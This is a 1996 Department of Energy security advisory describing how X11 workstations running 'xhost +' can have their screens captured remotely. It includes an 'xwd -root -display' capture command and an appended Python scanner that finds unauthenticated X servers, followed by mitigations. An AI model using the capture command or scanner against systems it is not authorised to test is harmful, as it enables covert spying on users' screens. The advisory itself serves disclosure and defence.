DEPARTMENT OF ENERGY
INFORMATION SECURITY RESOURCE CENTER
PACIFIC NORTHWEST NATIONAL LABORATORY
ADVISORY NOTICE No. 4
October 31, 1996
XHOST+
REMOTE SCREEN CAPTURE
During recent validation of a UNIX vulnerability, it was discovered that any system able to reach a UNIX workstation running X Windows on which xhost + has been invoked can capture an image of that workstation's screen over the network.
X Windows (X11) is the standard windowing system shipped with UNIX operating systems, and it is network-transparent: the X server runs on the machine that owns the keyboard and display, and client programs, local or remote, connect to it over TCP (port 6000 plus the display number) to draw windows and read what is on the screen. The server is normally started by xdm from the system boot files; xdm keeps the server running, prompts for user names and passwords, and starts the user's session, and it is easily configured for sites that want a consistent interface for novice users. Access to the server is governed by its host access list, which the xhost command manipulates: xhost hostname adds a host whose clients may connect, and xhost + (the plus sign alone) disables access control entirely, so that any host that can reach the port is accepted. Users and administrators commonly issue xhost + so that programs run on another machine will display without further setup, but once it is in effect every client connecting from anywhere on the network is treated as trusted and can do anything a local client can, including reading the contents of the entire screen.
Although the X server has previously been identified as a potential security exposure, a new problem has surfaced. From any system that has the standard X client utilities installed, it is possible to capture the screen image of any other computer running xhost + (whether the user who invoked it is root or not); the attacker needs neither root privilege nor xhost + on his own machine. The captured image is the target system's screen at the moment of capture. To initiate a screen capture, in an xterm window, enter:
xwd -root -display xxx.xxx.xxx.xxx:0.0 > filename
where xxx.xxx.xxx.xxx is the Internet Protocol (IP) address of the UNIX machine to be attacked and :0.0 is its first display. The -root option names the root window (the whole screen), not the root user. The attack in this case is to capture the targeted machine's screen; filename is the file on the attacker's computer in which the screen dump will be saved. To display the captured image, enter:
xwud -in filename
The screen capture is not a software bug; xwd is a standard X utility provided for system administration and information sharing. As part of the validation, the capture was first launched from a UNIX system that the target had named in its xhost access list (a trusted host) and succeeded. An identical attack was then mounted from a different UNIX system that the target had never been told about (an anonymous host) and succeeded again, confirming that xhost + admits every host, not only those explicitly named. The attack has the potential to be conducted through a firewall that passes TCP traffic to the X server port; no further analysis has been initiated at this time. The X server does not log client connections by default and gives the user no indication that a screen dump has been taken, so exploitation of this xhost + feature leaves no trace and can be run at any time.
Anyone who can reach the X server port of a user running xhost + can capture that user's screen image, whether or not the attacker runs xhost + himself. Using a simple script, an individual can step through the addresses of a network block, attempt an unauthenticated connection to each, and so determine which computers are running xhost +. An attacker can then set up a script to capture those screens at given intervals throughout the day and save the images for later review.
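The scan described above, as an added example for auditing one's own network (this code is not part of the original advisory): a Python probe that sends the X11 connection setup request with no authorization data to TCP port 6000 plus the display number on each host and classifies the server's reply. A server whose access control has been disabled with xhost + answers Success; one that is enforcing its host list answers Failed with the reason "Client is not authorized to connect to Server". The reply built by make_failed_reply is constructed from the protocol definition for offline testing, not captured from a real host, and the host list on the command line is the operator's own.

```python
"""Probe X servers for disabled access control (xhost +) by speaking the
X11 connection setup, which every X server answers before any client
request is accepted.  Added example; not from the original advisory."""
import socket
import struct

# Reason string a stock X server returns when host-based access control
# rejects a client (constructed here from the protocol spec).
REJECT_REASON = b"Client is not authorized to connect to Server"


def build_setup_request() -> bytes:
    """X11 setup request with empty authorization name and data.

    Layout: byte-order ('l' = LSB first), 1 pad, major=11, minor=0,
    name length=0, data length=0, 2 pad  -> 12 bytes total.
    A server running xhost + accepts this from any host.
    """
    return struct.pack("<cxHHHHxx", b"l", 11, 0, 0, 0)


def parse_setup_reply(data: bytes) -> tuple:
    """Classify the server's reply: ('success'|'failed'|'authenticate'|
    'short'|'unknown', reason_text)."""
    if len(data) < 8:
        return ("short", "")
    code = data[0]
    if code == 1:
        # Success: the rest is the server's display description
        return ("success", "")
    if code == 0:
        # Failed: byte 1 = reason length; major, minor, length follow;
        # the reason string starts at offset 8
        n = data[1]
        return ("failed", data[8:8 + n].decode("latin-1", "replace"))
    if code == 2:
        # Authenticate: 5 pad bytes, CARD16 length, reason at offset 8
        return ("authenticate", data[8:].rstrip(b"\0").decode("latin-1", "replace"))
    return ("unknown", "")


def make_failed_reply(reason: bytes) -> bytes:
    """Construct a 'Failed' reply as a server sends it (offline test input)."""
    body = reason + b"\0" * ((-len(reason)) % 4)  # pad to 4-byte boundary
    return struct.pack("<BBHHH", 0, len(reason), 11, 0, len(body) // 4) + body


def probe_display(host: str, display: int = 0, timeout: float = 3.0) -> tuple:
    """Connect to host:display (TCP 6000 + display), send the unauthenticated
    setup request and classify the answer.  Network errors -> 'unreachable'."""
    try:
        with socket.create_connection((host, 6000 + display), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(build_setup_request())
            reply = s.recv(4096)
    except OSError as exc:
        return ("unreachable", str(exc))
    return parse_setup_reply(reply)


def scan(hosts, display: int = 0) -> list:
    """Hosts whose X server accepted a connection with no authorization,
    i.e. the ones on which xhost + (or equivalent) is in effect."""
    return [h for h in hosts if probe_display(h, display)[0] == "success"]


if __name__ == "__main__":
    import sys
    # Usage: python x11probe.py host1 host2 ...   (hosts you are authorised to test)
    for host in sys.argv[1:]:
        status, reason = probe_display(host)
        print(f"{host}:0  {status}  {reason}")
```

Only hosts that return "success" are exposed; "failed" with the reason above means access control is on and the probing host is simply not in the list, which is the expected result for a correctly configured workstation.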
It is recommended that this information be coordinated with the CIAC and that an assessment be conducted to determine the extent of the potential threat posed to the DOE Information Assurance Infrastructure. Individual users can close the exposure on their own workstations immediately with xhost - (which re-enables the server's access control) and by granting remote clients access through xauth cookies (MIT-MAGIC-COOKIE-1) rather than by host.
Last Updated October 2001